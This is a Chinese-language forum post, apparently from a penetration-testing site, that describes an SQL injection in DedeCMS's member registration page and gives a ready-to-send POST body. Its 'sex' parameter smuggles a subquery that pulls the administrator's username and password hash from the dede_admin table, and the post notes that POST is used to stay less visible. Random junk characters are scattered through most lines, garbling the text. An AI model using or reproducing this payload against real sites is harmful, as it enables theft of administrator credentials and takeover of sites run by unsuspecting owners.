中国网络渗透测试联盟

标题: 织梦SQL注入漏洞再利用 [打印本页]

作者: admin    时间: 2013-1-19 08:25
标题: 织梦SQL注入漏洞再利用
漏洞类型: SQL注射漏洞
: Q" |( @/ Y, z- u9 G! j- @简要描述:
* ]6 D7 r* D! Z+ f
' b$ ]: |% T: l' s需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.
. x& i1 I9 T$ W原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
+ Y/ V$ J: U: H$ u详细说明:跟这个漏洞
( [- t2 Q9 y! D# I7 E9 X) T
. b2 X; ?1 q8 e! t8 ?$ t5 N( G( ?/ q3 _WooYun: Dedecms SQL注射导致审核机制绕过漏洞
8 o, {" m+ R7 I! E0 ~" h是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.+ i' v! u/ p7 @- D! [& g2 e" D5 O
POST提交以下数据,其实不用POST提交的,这样隐蔽点.- i* T" a' ]5 j# N

6 S: R1 ^- P  \www.political-security.com/member/reg_new.php
+ |$ J1 o" c9 P8 G  i$ d3 i
2 A+ l( q! m5 Z0 f; s6 PPOST
' b8 @# i8 A$ Z3 C$ s$ ~ : q6 Y* ?& y4 t9 u
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&0 P! O7 p; n, [; f# P
userid=c4rp3nt3r&uname=c4rp3nt3r
3 e  F. d& U' k( B" ^&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss$ X& G. u# @2 P  n2 H4 P7 t
&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,0 F) e; |6 Y: I. u. }( l
(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');6 W5 z+ l* y/ \6 X2 {
%00&vdcode=glos&agree=




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2